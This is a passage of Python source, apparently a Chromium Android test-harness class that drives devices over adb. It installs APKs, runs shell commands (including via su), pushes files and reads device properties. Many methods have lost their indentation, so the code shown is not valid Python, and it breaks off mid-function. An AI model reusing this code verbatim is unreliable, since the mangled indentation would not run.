  def Shutdown(self):
    """Shuts down the device."""
    # 'reboot -p' powers the device off rather than restarting it.
    self._adb.SendCommand('reboot -p')
    self._system_properties = system_properties.SystemProperties(self.Adb())
def Uninstall(self, package):
"""Uninstalls the specified package from the device.
Args:
package: Name of the package to remove.
Returns:
A status string returned by adb uninstall
"""
uninstall_command = 'uninstall %s' % package
self._LogShell(uninstall_command)
return self._adb.SendCommand(uninstall_command, timeout_time=60)
  def Install(self, package_file_path, reinstall=False):
    """Installs the specified package to the device.

    Args:
      package_file_path: Path to .apk file to install.
      reinstall: Reinstall an existing apk, keeping the data.

    Returns:
      A status string returned by adb install
    """
    assert os.path.isfile(package_file_path), ('<%s> is not file' %
                                               package_file_path)

    install_cmd = ['install']

    if reinstall:
      install_cmd.append('-r')

    install_cmd.append(package_file_path)
    install_cmd = ' '.join(install_cmd)
    self._LogShell(install_cmd)
    # NOTE(review): retry_count=0 — presumably because re-sending a partially
    # applied install is unsafe; confirm before changing.
    return self._adb.SendCommand(install_cmd,
                                 timeout_time=2 * 60,
                                 retry_count=0)
  def ManagedInstall(self, apk_path, keep_data=False, package_name=None,
                     reboots_on_timeout=2):
    """Installs specified package and reboots device on timeouts.

    If package_name is supplied, checks if the package is already installed and
    doesn't reinstall if the apk md5sums match.

    Args:
      apk_path: Path to .apk file to install.
      keep_data: Reinstalls instead of uninstalling first, preserving the
        application data.
      package_name: Package name (only needed if keep_data=False).
      reboots_on_timeout: number of time to reboot if package manager is frozen.

    Raises:
      Exception: on install failure, or on timeout once reboot retries are
        exhausted.
    """
    # Check if package is already installed and up to date.
    if package_name:
      installed_apk_path = self.GetApplicationPath(package_name)
      if (installed_apk_path and
          not self.GetFilesChanged(apk_path, installed_apk_path,
                                   ignore_filenames=True)):
        logging.info('Skipped install: identical %s APK already installed' %
            package_name)
        return
    # Install.
    reboots_left = reboots_on_timeout
    while True:
      try:
        if not keep_data:
          assert package_name
          self.Uninstall(package_name)
        install_status = self.Install(apk_path, reinstall=keep_data)
        if 'Success' in install_status:
          return
        else:
          raise Exception('Install failure: %s' % install_status)
      except errors.WaitForResponseTimedOutError:
        # Buildbot annotation: marks the step as warned on the waterfall.
        print '@@@STEP_WARNINGS@@@'
        logging.info('Timeout on installing %s on device %s', apk_path,
                     self._device)

        if reboots_left <= 0:
          raise Exception('Install timed out')

        # Force a hard reboot on last attempt
        self.Reboot(full_reboot=(reboots_left == 1))
        reboots_left -= 1
def MakeSystemFolderWritable(self):
"""Remounts the /system folder rw."""
out = self._adb.SendCommand('remount')
if out.strip() != 'remount succeeded':
raise errors.MsgException('Remount failed: %s' % out)
  def RestartAdbdOnDevice(self):
    """Restarts the adbd daemon on the device via a pushed helper script."""
    logging.info('Restarting adbd on the device...')
    with DeviceTempFile(self, suffix=".sh") as temp_script_file:
      host_script_path = os.path.join(constants.DIR_SOURCE_ROOT,
                                      'build',
                                      'android',
                                      'pylib',
                                      'restart_adbd.sh')
      self._adb.Push(host_script_path, temp_script_file.name)
      # Source the script (runs it in the shell); then wait for the restarted
      # adbd to accept connections again before returning.
      self.RunShellCommand('. %s' % temp_script_file.name)
      self._adb.SendCommand('wait-for-device')
  def RestartAdbServer(self):
    """Restart the adb server.

    Raises:
      errors.MsgException: if killing or starting the server fails.
    """
    ret = self.KillAdbServer()
    if ret != 0:
      raise errors.MsgException('KillAdbServer: %d' % ret)

    ret = self.StartAdbServer()
    if ret != 0:
      raise errors.MsgException('StartAdbServer: %d' % ret)
  @staticmethod
  def KillAdbServer():
    """Kill adb server.

    Returns:
      0 on success (no adb process remains), non-zero otherwise.
    """
    adb_cmd = [constants.GetAdbPath(), 'kill-server']
    ret = cmd_helper.RunCmd(adb_cmd)
    retry = 0
    while retry < 3:
      ret, _ = cmd_helper.GetCmdStatusAndOutput(['pgrep', 'adb'])
      if ret != 0:
        # pgrep didn't find adb, kill-server succeeded.
        return 0
      retry += 1
      time.sleep(retry)  # linear backoff: 1s, 2s, 3s
    return ret
  def StartAdbServer(self):
    """Start adb server.

    Returns:
      0 on success (adb process found and device reconnected), else non-zero.
    """
    # NOTE(review): 'taskset -c 0' pins the server to CPU 0 — presumably to
    # work around an adb affinity issue; confirm before removing.
    adb_cmd = ['taskset', '-c', '0', constants.GetAdbPath(), 'start-server']
    ret, _ = cmd_helper.GetCmdStatusAndOutput(adb_cmd)
    retry = 0
    while retry < 3:
      ret, _ = cmd_helper.GetCmdStatusAndOutput(['pgrep', 'adb'])
      if ret == 0:
        # pgrep found adb, start-server succeeded.
        # Waiting for device to reconnect before returning success.
        self._adb.SendCommand('wait-for-device')
        return 0
      retry += 1
      time.sleep(retry)  # linear backoff: 1s, 2s, 3s
    return ret
  def WaitForSystemBootCompleted(self, wait_time):
    """Waits for targeted system's boot_completed flag to be set.

    Args:
      wait_time: time in seconds to wait

    Raises:
      WaitForResponseTimedOutError if wait_time elapses and flag still not
      set.
    """
    logging.info('Waiting for system boot completed...')
    self._adb.SendCommand('wait-for-device')
    # Now the device is there, but system not boot completed.
    # Query the sys.boot_completed flag with a basic command
    boot_completed = False
    attempts = 0
    wait_period = 5
    while not boot_completed and (attempts * wait_period) < wait_time:
      output = self.system_properties['sys.boot_completed']
      output = output.strip()
      if output == '1':
        boot_completed = True
      else:
        # If 'error: xxx' returned when querying the flag, it means
        # adb server lost the connection to the emulator, so restart the adb
        # server.
        if 'error:' in output:
          self.RestartAdbServer()
        time.sleep(wait_period)
        attempts += 1
    if not boot_completed:
      raise errors.WaitForResponseTimedOutError(
          'sys.boot_completed flag was not set after %s seconds' % wait_time)
  def WaitForSdCardReady(self, timeout_time):
    """Wait for the SD card ready before pushing data into it.

    Args:
      timeout_time: seconds to wait before giving up.

    Raises:
      errors.WaitForResponseTimedOutError: if the card never becomes listable.
    """
    logging.info('Waiting for SD card ready...')
    sdcard_ready = False
    attempts = 0
    wait_period = 5
    external_storage = self.GetExternalStorage()
    while not sdcard_ready and attempts * wait_period < timeout_time:
      # Readiness test: a non-empty directory listing of external storage.
      output = self.RunShellCommand('ls ' + external_storage)
      if output:
        sdcard_ready = True
      else:
        time.sleep(wait_period)
        attempts += 1
    if not sdcard_ready:
      raise errors.WaitForResponseTimedOutError(
          'SD card not ready after %s seconds' % timeout_time)
  def GetAndroidToolStatusAndOutput(self, command, lib_path=None, *args, **kw):
    """Runs a native Android binary, wrapping the command as necessary.

    This is a specialization of GetShellCommandStatusAndOutput, which is meant
    for running tools/android/ binaries and handle properly: (1) setting the
    lib path (for component=shared_library), (2) using the PIE wrapper on ICS.
    See crbug.com/373219 for more context.

    Args:
      command: String containing the command to send.
      lib_path: (optional) path to the folder containing the dependent libs.
      Same other arguments of GetCmdStatusAndOutput.

    Returns:
      The (status, output lines) tuple from GetShellCommandStatusAndOutput.
    """
    # The first time this command is run the device is inspected to check
    # whether a wrapper for running PIE executable is needed (only Android ICS)
    # or not. The results is cached, so the wrapper is pushed only once.
    if self._pie_wrapper is None:
      # None: did not check; '': did check and not needed; '/path': use /path.
      self._pie_wrapper = ''
      if self.GetBuildId().startswith('I'):  # Ixxxx = Android ICS.
        run_pie_dist_path = os.path.join(constants.GetOutDirectory(), 'run_pie')
        assert os.path.exists(run_pie_dist_path), 'Please build run_pie'
        # The PIE loader must be pushed manually (i.e. no PushIfNeeded) because
        # PushIfNeeded requires md5sum and md5sum requires the wrapper as well.
        adb_command = 'push %s %s' % (run_pie_dist_path, PIE_WRAPPER_PATH)
        assert _HasAdbPushSucceeded(self._adb.SendCommand(adb_command))
        self._pie_wrapper = PIE_WRAPPER_PATH

    if self._pie_wrapper:
      command = '%s %s' % (self._pie_wrapper, command)
    if lib_path:
      command = 'LD_LIBRARY_PATH=%s %s' % (lib_path, command)
    return self.GetShellCommandStatusAndOutput(command, *args, **kw)
  # It is tempting to turn this function into a generator, however this is not
  # possible without using a private (local) adb_shell instance (to ensure no
  # other command interleaves usage of it), which would defeat the main aim of
  # being able to reuse the adb shell instance across commands.
  def RunShellCommand(self, command, timeout_time=20, log_result=False):
    """Send a command to the adb shell and return the result.

    Args:
      command: String containing the shell command to send.
      timeout_time: Number of seconds to wait for command to respond before
        retrying, used by AdbInterface.SendShellCommand.
      log_result: Boolean to indicate whether we should log the result of the
        shell command.

    Returns:
      list containing the lines of output received from running the command

    Raises:
      errors.DeviceUnresponsiveError: if adb reports the device is gone.
    """
    self._LogShell(command)
    # Escape embedded single quotes so the whole command survives the outer
    # single-quoting below ('...' -> '\'' sequence).
    if "'" in command:
      command = command.replace('\'', '\'\\\'\'')
    result = self._adb.SendShellCommand(
        "'%s'" % command, timeout_time).splitlines()
    # TODO(b.kelemen): we should really be able to drop the stderr of the
    # command or raise an exception based on what the caller wants.
    result = [ l for l in result if not l.startswith('WARNING') ]
    if ['error: device not found'] == result:
      raise errors.DeviceUnresponsiveError('device not found')
    if log_result:
      self._LogShell('\n'.join(result))
    return result
  def GetShellCommandStatusAndOutput(self, command, timeout_time=20,
                                     log_result=False):
    """See RunShellCommand() above.

    Returns:
      The tuple (exit code, list of output lines).
    """
    # Append 'echo %$?' so the exit status rides on the last output line;
    # '%' is the marker used to find it again below.
    lines = self.RunShellCommand(
        command + '; echo %$?', timeout_time, log_result)
    last_line = lines[-1]
    status_pos = last_line.rfind('%')
    assert status_pos >= 0
    status = int(last_line[status_pos + 1:])
    if status_pos == 0:
      # The marker was the whole line: drop it entirely.
      lines = lines[:-1]
    else:
      # The command's final output had no trailing newline: strip the marker
      # suffix but keep the preceding text.
      lines = lines[:-1] + [last_line[:status_pos]]
    return (status, lines)
def KillAll(self, process, signum=9, with_su=False):
"""Android version of killall, connected via adb.
Args:
process: name of the process to kill off.
signum: signal to use, 9 (SIGKILL) by default.
with_su: wether or not to use su to kill the processes.
Returns:
the number of processes killed
"""
pids = self.ExtractPid(process)
if pids:
cmd = 'kill -%d %s' % (signum, ' '.join(pids))
if with_su:
self.RunShellCommandWithSU(cmd)
else:
self.RunShellCommand(cmd)
return len(pids)
def KillAllBlocking(self, process, timeout_sec, signum=9, with_su=False):
"""Blocking version of killall, connected via adb.
This waits until no process matching the corresponding name appears in ps'
output anymore.
Args:
process: name of the process to kill off
timeout_sec: the timeout in seconds
signum: same as |KillAll|
with_su: same as |KillAll|
Returns:
the number of processes killed
"""
processes_killed = self.KillAll(process, signum=signum, with_su=with_su)
if processes_killed:
elapsed = 0
wait_period = 0.1
# Note that this doesn't take into account the time spent in ExtractPid().
while self.ExtractPid(process) and elapsed < timeout_sec:
time.sleep(wait_period)
elapsed += wait_period
if elapsed >= timeout_sec:
return processes_killed - self.ExtractPid(process)
return processes_killed
  @staticmethod
  def _GetActivityCommand(package, activity, wait_for_completion, action,
                          category, data, extras, trace_file_name, force_stop,
                          flags):
    """Creates command to start |package|'s activity on the device.

    Args - as for StartActivity

    Returns:
      the command to run on the target to start the activity
    """
    cmd = 'am start -a %s' % action
    if force_stop:
      cmd += ' -S'
    if wait_for_completion:
      cmd += ' -W'
    if category:
      cmd += ' -c %s' % category
    if package and activity:
      cmd += ' -n %s/%s' % (package, activity)
    if data:
      cmd += ' -d "%s"' % data
    if extras:
      for key in extras:
        value = extras[key]
        # Map Python type to the matching 'am' extra flag. The bool check must
        # stay before the int check: isinstance(True, int) is also True.
        if isinstance(value, str):
          cmd += ' --es'
        elif isinstance(value, bool):
          cmd += ' --ez'
        elif isinstance(value, int):
          cmd += ' --ei'
        else:
          raise NotImplementedError(
              'Need to teach StartActivity how to pass %s extras' % type(value))
        cmd += ' %s %s' % (key, value)
    if trace_file_name:
      cmd += ' --start-profiler ' + trace_file_name
    if flags:
      cmd += ' -f %s' % flags
    return cmd
  def StartActivity(self, package, activity, wait_for_completion=False,
                    action='android.intent.action.VIEW',
                    category=None, data=None,
                    extras=None, trace_file_name=None,
                    force_stop=False, flags=None):
    """Starts |package|'s activity on the device.

    Args:
      package: Name of package to start (e.g. 'com.google.android.apps.chrome').
      activity: Name of activity (e.g. '.Main' or
        'com.google.android.apps.chrome.Main').
      wait_for_completion: wait for the activity to finish launching (-W flag).
      action: string (e.g. "android.intent.action.MAIN"). Default is VIEW.
      category: string (e.g. "android.intent.category.HOME")
      data: Data string to pass to activity (e.g. 'http://www.example.com/').
      extras: Dict of extras to pass to activity. Values are significant.
      trace_file_name: If used, turns on and saves the trace to this file name.
      force_stop: force stop the target app before starting the activity (-S
        flag).
      flags: intent flags passed to 'am start -f'.

    Returns:
      The output of the underlying command as a list of lines.
    """
    cmd = self._GetActivityCommand(package, activity, wait_for_completion,
                                   action, category, data, extras,
                                   trace_file_name, force_stop, flags)
    return self.RunShellCommand(cmd)
  def StartActivityTimed(self, package, activity, wait_for_completion=False,
                         action='android.intent.action.VIEW',
                         category=None, data=None,
                         extras=None, trace_file_name=None,
                         force_stop=False, flags=None):
    """Starts |package|'s activity on the device, returning the start time

    Args - as for StartActivity

    Returns:
      A tuple containing:
        - the output of the underlying command as a list of lines, and
        - a timestamp string for the time at which the activity started
    """
    cmd = self._GetActivityCommand(package, activity, wait_for_completion,
                                   action, category, data, extras,
                                   trace_file_name, force_stop, flags)
    self.StartMonitoringLogcat()
    # Emit a marker line into logcat just before launching, then wait for it;
    # its logcat timestamp is the activity start time.
    out = self.RunShellCommand('log starting activity; ' + cmd)
    activity_started_re = re.compile('.*starting activity.*')
    m = self.WaitForLogMatch(activity_started_re, None)
    assert m
    start_line = m.group(0)
    return (out, GetLogTimestamp(start_line, self.GetDeviceYear()))
  def StartCrashUploadService(self, package):
    """Starts |package|'s MinidumpUploadService to upload pending crash dumps.

    Runs as root (su) and sleeps 15s to give the service time to act.
    """
    # TODO(frankf): We really need a python wrapper around Intent
    # to be shared with StartActivity/BroadcastIntent.
    cmd = (
        'am startservice -a %s.crash.ACTION_FIND_ALL -n '
        '%s/%s.crash.MinidumpUploadService' %
        (constants.PACKAGE_INFO['chrome'].package,
         package,
         constants.PACKAGE_INFO['chrome'].package))
    am_output = self.RunShellCommandWithSU(cmd)
    assert am_output and 'Starting' in am_output[-1], (
        'Service failed to start: %s' % am_output)
    time.sleep(15)
def BroadcastIntent(self, package, intent, *args):
"""Send a broadcast intent.
Args:
package: Name of package containing the intent.
intent: Name of the intent.
args: Optional extra arguments for the intent.
"""
cmd = 'am broadcast -a %s.%s %s' % (package, intent, ' '.join(args))
self.RunShellCommand(cmd)
  def GoHome(self):
    """Tell the device to return to the home screen. Blocks until completion."""
    # '-W' makes 'am start' wait for the launch to complete.
    self.RunShellCommand('am start -W '
        '-a android.intent.action.MAIN -c android.intent.category.HOME')
  def CloseApplication(self, package):
    """Attempt to close down the application, using increasing violence.

    Args:
      package: Name of the process to kill off, e.g.
          com.google.android.apps.chrome
    """
    self.RunShellCommand('am force-stop ' + package)
def GetApplicationPath(self, package):
"""Get the installed apk path on the device for the given package.
Args:
package: Name of the package.
Returns:
Path to the apk on the device if it exists, None otherwise.
"""
pm_path_output = self.RunShellCommand('pm path ' + package)
# The path output contains anything if and only if the package
# exists.
if pm_path_output:
# pm_path_output is of the form: "package:/path/to/foo.apk"
return pm_path_output[0].split(':')[1]
else:
return None
  def ClearApplicationState(self, package):
    """Closes and clears all state for the given |package|."""
    # Check that the package exists before clearing it. Necessary because
    # calling pm clear on a package that doesn't exist may never return.
    pm_path_output = self.RunShellCommand('pm path ' + package)
    # The path output only contains anything if and only if the package exists.
    if pm_path_output:
      self.RunShellCommand('pm clear ' + package)
  def SendKeyEvent(self, keycode):
    """Sends keycode to the device.

    Args:
      keycode: Numeric keycode to send (see "enum" at top of file).
    """
    self.RunShellCommand('input keyevent %d' % keycode)
  def _RunMd5Sum(self, host_path, device_path):
    """Gets the md5sum of a host path and device path.

    Args:
      host_path: Path (file or directory) on the host.
      device_path: Path on the device.

    Returns:
      A tuple containing lists of the host and device md5sum results as
      created by _ParseMd5SumOutput().
    """
    md5sum_dist_path = os.path.join(constants.GetOutDirectory(),
                                    'md5sum_dist')
    assert os.path.exists(md5sum_dist_path), 'Please build md5sum.'
    # Re-push the md5sum tool only when the local binary's mtime changed since
    # the last push (mtime is cached in _push_if_needed_cache).
    md5sum_dist_mtime = os.stat(md5sum_dist_path).st_mtime
    if (md5sum_dist_path not in self._push_if_needed_cache or
        self._push_if_needed_cache[md5sum_dist_path] != md5sum_dist_mtime):
      command = 'push %s %s' % (md5sum_dist_path, MD5SUM_DEVICE_FOLDER)
      assert _HasAdbPushSucceeded(self._adb.SendCommand(command))
      self._push_if_needed_cache[md5sum_dist_path] = md5sum_dist_mtime

    (_, md5_device_output) = self.GetAndroidToolStatusAndOutput(
        self._util_wrapper + ' ' + MD5SUM_DEVICE_PATH + ' ' + device_path,
        lib_path=MD5SUM_DEVICE_FOLDER,
        timeout_time=2 * 60)
    device_hash_tuples = _ParseMd5SumOutput(md5_device_output)
    assert os.path.exists(host_path), 'Local path not found %s' % host_path
    md5sum_output = cmd_helper.GetCmdOutput(
        [os.path.join(constants.GetOutDirectory(), 'md5sum_bin_host'),
         host_path])
    host_hash_tuples = _ParseMd5SumOutput(md5sum_output.splitlines())
    return (host_hash_tuples, device_hash_tuples)
  def GetFilesChanged(self, host_path, device_path, ignore_filenames=False):
    """Compares the md5sum of a host path against a device path.

    Note: Ignores extra files on the device.

    Args:
      host_path: Path (file or directory) on the host.
      device_path: Path on the device.
      ignore_filenames: If True only the file contents are considered when
          checking whether a file has changed, otherwise the relative path
          must also match.

    Returns:
      A list of tuples of the form (host_path, device_path) for files whose
      md5sums do not match.
    """

    # Md5Sum resolves symbolic links in path names so the calculation of
    # relative path names from its output will need the real path names of the
    # base directories. Having calculated these they are used throughout the
    # function since this makes us less subject to any future changes to Md5Sum.
    real_host_path = os.path.realpath(host_path)
    real_device_path = self.RunShellCommand('realpath "%s"' % device_path)[0]

    host_hash_tuples, device_hash_tuples = self._RunMd5Sum(
        real_host_path, real_device_path)

    if len(host_hash_tuples) > len(device_hash_tuples):
      logging.info('%s files do not exist on the device' %
                   (len(host_hash_tuples) - len(device_hash_tuples)))

    # (relative path, hash) for every host file.
    host_rel = [(os.path.relpath(os.path.normpath(t.path), real_host_path),
                 t.hash)
                for t in host_hash_tuples]

    if os.path.isdir(real_host_path):
      def RelToRealPaths(rel_path):
        return (os.path.join(real_host_path, rel_path),
                os.path.join(real_device_path, rel_path))
    else:
      # For a single file, md5sum produced exactly one entry; map it straight
      # to the two real paths regardless of the relative name.
      assert len(host_rel) == 1
      def RelToRealPaths(_):
        return (real_host_path, real_device_path)

    if ignore_filenames:
      # If we are ignoring file names, then we want to push any file for which
      # a file with an equivalent MD5 sum does not exist on the device.
      device_hashes = set([h.hash for h in device_hash_tuples])
      ShouldPush = lambda p, h: h not in device_hashes
    else:
      # Otherwise, we want to push any file on the host for which a file with
      # an equivalent MD5 sum does not exist at the same relative path on the
      # device.
      device_rel = dict([(os.path.relpath(os.path.normpath(t.path),
                                          real_device_path),
                          t.hash)
                         for t in device_hash_tuples])
      ShouldPush = lambda p, h: p not in device_rel or h != device_rel[p]

    return [RelToRealPaths(path) for path, host_hash in host_rel
            if ShouldPush(path, host_hash)]
  def PushIfNeeded(self, host_path, device_path):
    """Pushes |host_path| to |device_path|.

    Works for files and directories. This method skips copying any paths in
    |test_data_paths| that already exist on the device with the same hash.

    All pushed files can be removed by calling RemovePushedFiles().

    Raises:
      device_errors.CommandFailedError: if |host_path| does not exist.
    """
    MAX_INDIVIDUAL_PUSHES = 50
    if not os.path.exists(host_path):
      raise device_errors.CommandFailedError(
          'Local path not found %s' % host_path, device=str(self))

    # See if the file on the host changed since the last push (if any) and
    # return early if it didn't. Note that this shortcut assumes that the tests
    # on the device don't modify the files.
    if not os.path.isdir(host_path):
      if host_path in self._push_if_needed_cache:
        host_path_mtime = self._push_if_needed_cache[host_path]
        if host_path_mtime == os.stat(host_path).st_mtime:
          return

    size = host_utils.GetRecursiveDiskUsage(host_path)
    self._pushed_files.append(device_path)
    self._potential_push_size += size

    if os.path.isdir(host_path):
      self.RunShellCommand('mkdir -p "%s"' % device_path)

    changed_files = self.GetFilesChanged(host_path, device_path)
    logging.info('Found %d files that need to be pushed to %s',
        len(changed_files), device_path)
    if not changed_files:
      return

    def Push(host, device):
      # NOTE: We can't use adb_interface.Push() because it hardcodes a timeout
      # of 60 seconds which isn't sufficient for a lot of users of this method.
      push_command = 'push %s %s' % (host, device)
      self._LogShell(push_command)

      # Retry push with increasing backoff if the device is busy.
      retry = 0
      while True:
        output = self._adb.SendCommand(push_command, timeout_time=30 * 60)
        if _HasAdbPushSucceeded(output):
          if not os.path.isdir(host_path):
            # Remember the pushed file's mtime for the early-out above.
            self._push_if_needed_cache[host] = os.stat(host).st_mtime
          return
        if retry < 3:
          retry += 1
          wait_time = 5 * retry
          logging.error('Push failed, retrying in %d seconds: %s' %
                        (wait_time, output))
          time.sleep(wait_time)
        else:
          raise Exception('Push failed: %s' % output)

    diff_size = 0
    if len(changed_files) <= MAX_INDIVIDUAL_PUSHES:
      diff_size = sum(host_utils.GetRecursiveDiskUsage(f[0])
                      for f in changed_files)

    # TODO(craigdh): Replace this educated guess with a heuristic that
    # approximates the push time for each method.
    if len(changed_files) > MAX_INDIVIDUAL_PUSHES or diff_size > 0.5 * size:
      # Many/large changes: one bulk push of the whole tree is cheaper than
      # issuing an adb push per file.
      self._actual_push_size += size
      Push(host_path, device_path)
    else:
      for f in changed_files:
        Push(f[0], f[1])
      self._actual_push_size += diff_size
  def GetPushSizeInfo(self):
    """Get total size of pushes to the device done via PushIfNeeded()

    Returns:
      A tuple:
        1. Total size of push requests to PushIfNeeded (MB)
        2. Total size that was actually pushed (MB)
    """
    # Counters are accumulated in PushIfNeeded(); units come from
    # host_utils.GetRecursiveDiskUsage.
    return (self._potential_push_size, self._actual_push_size)
  def GetFileContents(self, filename, log_result=False):
    """Gets contents from the file specified by |filename|.

    Returns a list of output lines; stderr is discarded, so a missing file
    yields an empty list rather than an error.
    """
    return self.RunShellCommand('cat "%s" 2>/dev/null' % filename,
                                log_result=log_result)
  def SetFileContents(self, filename, contents):
    """Writes |contents| to the file specified by |filename|.

    Stages the contents in a host temp file and pushes it to the device.
    """
    with tempfile.NamedTemporaryFile() as f:
      f.write(contents)
      # Flush so the push below sees the full contents.
      f.flush()
      self._adb.Push(f.name, filename)
  def RunShellCommandWithSU(self, command, timeout_time=20, log_result=False):
    """Runs |command| through 'su -c'; see RunShellCommand() for arguments."""
    return self.RunShellCommand('su -c %s' % command, timeout_time, log_result)
def CanAccessProtectedFileContents(self):
"""Returns True if Get/SetProtectedFileContents would work via "su" or adb
shell running as root.
Devices running user builds don't have adb root, but may provide "su" which
can be used for accessing protected files.
"""
return (self._GetProtectedFileCommandRunner() != None)
  def _GetProtectedFileCommandRunner(self):
    """Finds the best method to access protected files on the device.

    Returns:
      1. None when privileged files cannot be accessed on the device.
      2. Otherwise: A function taking a single parameter: a string with command
         line arguments. Running that function executes the command with
         the appropriate method.
    """
    # The probe result is cached; the first call pays the device round-trips.
    if self._protected_file_access_method_initialized:
      return self._privileged_command_runner

    self._privileged_command_runner = None
    self._protected_file_access_method_initialized = True

    # Try plain adb shell first, then 'su -c'; first one that can read the
    # protected file wins.
    for cmd in [self.RunShellCommand, self.RunShellCommandWithSU]:
      # Get contents of the auxv vector for the init(8) process from a small
      # binary file that always exists on linux and is always read-protected.
      contents = cmd('cat /proc/1/auxv')
      # The leading 4 or 8-bytes of auxv vector is a_type. There are not many
      # reserved a_type values, hence byte 2 must always be '\0' for a realistic
      # auxv. See /usr/include/elf.h.
      if len(contents) > 0 and (contents[0][2] == '\0'):
        self._privileged_command_runner = cmd
        break
    return self._privileged_command_runner
  def GetProtectedFileContents(self, filename):
    """Gets contents from the protected file specified by |filename|.

    This is potentially less efficient than GetFileContents.

    Returns an empty list when no privileged access method is available.
    """
    command = 'cat "%s" 2> /dev/null' % filename
    command_runner = self._GetProtectedFileCommandRunner()
    if command_runner:
      return command_runner(command)
    else:
      logging.warning('Could not access protected file: %s' % filename)
      return []
  def SetProtectedFileContents(self, filename, contents):
    """Writes |contents| to the protected file specified by |filename|.

    This is less efficient than SetFileContents.
    """
    with DeviceTempFile(self) as temp_file:
      with DeviceTempFile(self, suffix=".sh") as temp_script:
        # Put the contents in a temporary file
        self.SetFileContents(temp_file.name, contents)
        # Create a script to copy the file contents to its final destination
        # (the copy itself must run privileged; staging the data does not).
        self.SetFileContents(temp_script.name,
                             'cat %s > %s' % (temp_file.name, filename))

        command = 'sh %s' % temp_script.name
        command_runner = self._GetProtectedFileCommandRunner()
        if command_runner:
          return command_runner(command)
        else:
          logging.warning(
              'Could not set contents of protected file: %s' % filename)
def RemovePushedFiles(self):
"""Removes all files pushed with PushIfNeeded() from the device."""
for p in self._pushed_files:
self.RunShellCommand('rm -r %s' % p, timeout_time=2 * 60)
  def ListPathContents(self, path):
    """Lists files in all subdirectories of |path|.

    Args:
      path: The path to list.

    Returns:
      A dict of {"name": (size, lastmod), ...}.
    """
    # Example output:
    # /foo/bar:
    # -rw-r----- user group   102 2011-05-12 12:29:54.131623387 +0100 baz.txt
    # NOTE(review): these patterns should ideally be raw strings; '\s' has no
    # escape meaning so behavior is unchanged, but py3 warns on it.
    re_file = re.compile('^-(?P<perms>[^\s]+)\s+'
                         '(?P<user>[^\s]+)\s+'
                         '(?P<group>[^\s]+)\s+'
                         '(?P<size>[^\s]+)\s+'
                         '(?P<date>[^\s]+)\s+'
                         '(?P<time>[^\s]+)\s+'
                         '(?P<filename>[^\s]+)$')
    return _GetFilesFromRecursiveLsOutput(
        path, self.RunShellCommand('ls -lR %s' % path), re_file,
        self.GetUtcOffset())
  def GetUtcOffset(self):
    """Returns the device's UTC offset string (e.g. '+0100'), cached."""
    if not self._device_utc_offset:
      self._device_utc_offset = self.RunShellCommand('date +%z')[0]
    return self._device_utc_offset
def SetJavaAssertsEnabled(self, enable):
"""Sets or removes the device java assertions property.
Args:
enable: If True the property will be set.
Returns:
True if the file was modified (reboot is required for it to take effect).
"""
# First ensure the desired property is persisted.
temp_props_file = tempfile.NamedTemporaryFile()
properties = ''
if self._adb.Pull(LOCAL_PROPERTIES_PATH, temp_props_file.name):
with open(temp_props_file.name) as f:
properties = f.read()
re_search = re.compile(r'^\s*' + re.escape(JAVA_ASSERT_PROPERTY) +
r'\s*=\s*all\s*$', re.MULTILINE)
if enable != bool(re.search(re_search, properties)):
re_replace = re.compile(r'^\s*' + re.escape(JAVA_ASSERT_PROPERTY) +
r'\s*=\s*\w+\s*$', re.MULTILINE)
properties = re.sub(re_replace, '', properties)
if enable:
properties += '\n%s=all\n' % JAVA_ASSERT_PROPERTY
file(temp_props_file.name, 'w').write(properties)
self._adb.Push(temp_props_file.name, LOCAL_PROPERTIES_PATH)
# Next, check the current runtime value is what we need, and
# if not, set it and report that a reboot is required.
was_set = 'all' in self.system_properties[JAVA_ASSERT_PROPERTY]
if was_set == enable:
return False
self.system_properties[JAVA_ASSERT_PROPERTY] = enable and 'all' or ''
return True
def GetBuildId(self):
  """Returns the build ID of the system (e.g. JRM79C)."""
  build_id = self.system_properties['ro.build.id']
  # An empty value would indicate a property lookup failure.
  assert build_id
  return build_id
def GetBuildType(self):
  """Returns the build type of the system (e.g. eng)."""
  # 'user' builds cannot enable adb root; see EnableAdbRoot.
  build_type = self.system_properties['ro.build.type']
  assert build_type
  return build_type
def GetBuildProduct(self):
  """Returns the build product of the device (e.g. maguro)."""
  build_product = self.system_properties['ro.build.product']
  # An empty value would indicate a property lookup failure.
  assert build_product
  return build_product
def GetProductName(self):
  """Returns the product name of the device (e.g. takju)."""
  name = self.system_properties['ro.product.name']
  # An empty value would indicate a property lookup failure.
  assert name
  return name
def GetBuildFingerprint(self):
  """Returns the build fingerprint of the device."""
  build_fingerprint = self.system_properties['ro.build.fingerprint']
  # An empty value would indicate a property lookup failure.
  assert build_fingerprint
  return build_fingerprint
def GetDescription(self):
  """Returns the description of the system.

  For example, "yakju-userdebug 4.1 JRN54F 364167 dev-keys".
  """
  description = self.system_properties['ro.build.description']
  # An empty value would indicate a property lookup failure.
  assert description
  return description
def GetProductModel(self):
  """Returns the name of the product model (e.g. "Galaxy Nexus")."""
  model = self.system_properties['ro.product.model']
  # An empty value would indicate a property lookup failure.
  assert model
  return model
def GetWifiIP(self):
  """Returns the wifi IP on the device (may be empty)."""
  wifi_ip = self.system_properties['dhcp.wlan0.ipaddress']
  # Do not assert here. Devices (e.g. emulators) may not have a WifiIP.
  return wifi_ip
def GetSubscriberInfo(self):
  """Returns the device subscriber info (e.g. GSM and device ID) as a
  newline-joined string.
  """
  iphone_sub = self.RunShellCommand('dumpsys iphonesubinfo')
  # Do not assert here. Devices (e.g. Nakasi on K) may not have iphonesubinfo.
  return '\n'.join(iphone_sub)
def GetBatteryInfo(self):
  """Returns a {str: str} dict of battery info (e.g. status, level, etc)."""
  battery = self.RunShellCommand('dumpsys battery')
  assert battery
  battery_info = {}
  # Skip the first line (the dumpsys section header) and parse the
  # remaining 'key: value' lines.
  for line in battery[1:]:
    k, _, v = line.partition(': ')
    battery_info[k.strip()] = v.strip()
  return battery_info
def GetSetupWizardStatus(self):
  """Returns the status of the device setup wizard (e.g. DISABLED)."""
  status = self.system_properties['ro.setupwizard.mode']
  # On some devices, the status is empty if not otherwise set. In such cases
  # the caller should expect an empty string to be returned.
  return status
def StartMonitoringLogcat(self, clear=True, logfile=None, filters=None):
  """Starts monitoring the output of logcat, for use with WaitForLogMatch.

  Args:
    clear: If True the existing logcat output will be cleared, to avoiding
           matching historical output lurking in the log.
    logfile: Optional file-like object that receives a copy of the logcat
             stream (line endings normalized via NewLineNormalizer).
    filters: A list of logcat filters to be used.
  """
  if clear:
    self.RunShellCommand('logcat -c')
  args = []
  if self._adb._target_arg:
